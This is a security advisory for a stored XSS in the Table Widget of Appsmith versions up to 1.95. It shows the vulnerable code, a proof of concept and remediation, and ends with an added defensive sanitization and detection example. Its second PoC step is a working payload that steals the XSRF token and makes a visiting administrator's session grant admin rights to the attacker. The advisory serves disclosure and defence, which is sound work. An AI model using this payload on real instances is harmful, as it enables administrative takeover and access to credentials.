Critical Stored XSS & Privilege Escalation in Appsmith v1.95

Severity: Critical
Published by subrata71 as GHSA-5hw4-whxv-6794 on Mar 9, 2026
Package: appsmith/appsmith
Affected versions: <= 1.95
Patched versions: 1.96
Description
Summary

A Critical Stored XSS vulnerability exists in the Table Widget (TableWidgetV2). The root cause is a lack of HTML sanitization in the React component rendering pipeline, allowing malicious attributes to be interpolated into the DOM. By leveraging the "Invite Users" feature, an attacker with a regular user account (user@gmail.com) can force a System Administrator to execute a high-privileged API call (/api/v1/admin/env), resulting in a Full Administrative Account Takeover.

Details

1. Root Cause: Lack of Output Sanitization Sink

The vulnerability resides in the Table Widget's rendering engine.

File: app/client/src/widgets/TableWidgetV2/component/cellComponents/BasicCell.tsx

The BasicCell component fails to sanitize data when the columnType is set to URL or Plain Text. It returns raw user-supplied values that are directly rendered as React children, which the browser interprets as executable HTML.

Vulnerable Code Snippet (Lines 132-143 & 172-173):

```tsx
const contentToRender = useMemo(() => {
  switch (columnType) {
    case ColumnTypes.URL:
      // Direct interpolation of 'url' into href without sanitization
      return (
        <a href={url} target="_blank">
          {value}
        </a>
      );
    default:
      return value; // Line 141: Raw value returned
  }
}, [columnType, url, value]);

// Line 173: Final sink where unsanitized content is injected into the DOM
<Content ref={contentRef}>{contentToRender}</Content>
```

2. Attack Vector: XSS-to-CSRF via Social Engineering (Invite Feature)

Although the SESSION cookie is protected by HttpOnly, the XSRF-TOKEN is accessible via document.cookie. Since Appsmith allows any user to "Invite" others to their app, an attacker can use this as a delivery mechanism to execute a Cross-Privilege Request Forgery (CPRF) within the Admin's active session.

PoC (Proof of Concept)

Step 1: XSS Vulnerability Verification

- Log in with a regular user account: user@gmail.com.
- Create a new application and add a Table Widget.
- In the Table Data property, inject the following:

```json
[{ "id": 1, "payload": "<img src=x onerror=\"alert('XSS_Confirmed_at_'+document.domain)\">" }]
```

Step 2: Weaponization (Full Admin Takeover)

- As user@gmail.com, update the Table Data with the following payload, designed to modify the administrative environment:

```json
[ { "id": 1, "Status": "System Update Required", "payload": "<img src=x onerror=\"const t=document.cookie.match(/XSRF-TOKEN=([^;]+)/)[1];fetch('/api/v1/admin/env',{method:'PUT',headers:{'content-type':'application/json','x-xsrf-token':t},body:JSON.stringify({'APPSMITH_ADMIN_EMAILS':'admin@gmail.com,user@gmail.com'})}).then(()=>alert('Admin Privileges Granted to user@gmail.com'));\">" } ]
```

- Use the "Share" feature to invite the System Administrator (admin@gmail.com) to the app. This forces the Admin to view the malicious table upon opening the invitation.
- Once the Admin launches the app, the script executes in the background. It reads the Admin's XSRF-TOKEN and sends a PUT request to add user@gmail.com to the administrative whitelist.
- Result: Log in again as user@gmail.com. You will now have full access to the Admin Settings and all instance configurations.

Impact

Vulnerability Type: Stored XSS / Vertical Privilege Escalation.
Severity: 9.1 (Critical) | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Risk: Complete compromise of the Appsmith instance. Attackers gain access to sensitive environment variables, database credentials, and the ability to modify any application within the instance.

Weaknesses (as classified on the advisory)

- The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
- The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Recommended Remediation

- Sanitize Sinks: Wrap all dynamic outputs in BasicCell.tsx and related components with DOMPurify.sanitize().
- Hardened CSP: Implement a strict connect-src policy to prevent unauthorized API calls to administrative endpoints from XSS payloads.
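The following is an added example, not Appsmith's code or the advisory author's: it makes the two decisions behind the "Sanitize Sinks" recommendation (an href scheme allowlist for the URL column and HTML escaping for the Plain Text column) testable without a DOM or DOMPurify, and adds a defender-side scan of Table Data rows for the kind of active content used in the PoC. The base origin, the allowed-scheme set and the sample rows are assumptions.

```javascript
// Added example (not Appsmith's code). Dependency-free checks for the two
// BasicCell branches, plus a scan of Table Data rows for active content.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumed allowlist

// URL column: a cell value may reach href only if it parses and uses an allowed
// scheme; "javascript:" and "data:" URLs are rejected outright, not escaped.
function safeHref(value, base = "https://appsmith.example.invalid/") { // assumed origin
  if (typeof value !== "string") return null;
  let parsed;
  try {
    parsed = new URL(value.trim(), base); // base resolves relative paths
  } catch {
    return null; // unparsable input never reaches the href attribute
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Plain Text column: escape the characters that can open a tag or close an
// attribute, so the value is displayed verbatim instead of being parsed as HTML.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeCellText(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Detection: flag string fields in a Table Data array (the JSON shape used in the
// PoC) that carry markup with inline event handlers, script tags or javascript: URLs.
const ACTIVE_CONTENT = /<\s*[a-z][^>]*\bon[a-z]+\s*=|<\s*script\b|javascript\s*:/i;
function findActiveContent(rows) {
  const hits = [];
  rows.forEach((row, index) => {
    for (const [column, cell] of Object.entries(row)) {
      if (typeof cell === "string" && ACTIVE_CONTENT.test(cell)) {
        hits.push({ index, column });
      }
    }
  });
  return hits;
}

// Constructed sample rows: one benign, one carrying an img/onerror payload of the
// same shape as the advisory's first PoC step.
const SAMPLE_ROWS = [
  { id: 1, Status: "OK", payload: "plain text" },
  { id: 2, Status: "System Update Required", payload: '<img src=x onerror="alert(1)">' },
];
```

Running findActiveContent over an exported application's Table Data is a cheap way to triage existing apps on an unpatched instance; the escape and href checks are what a sanitizing wrapper around the sink has to guarantee.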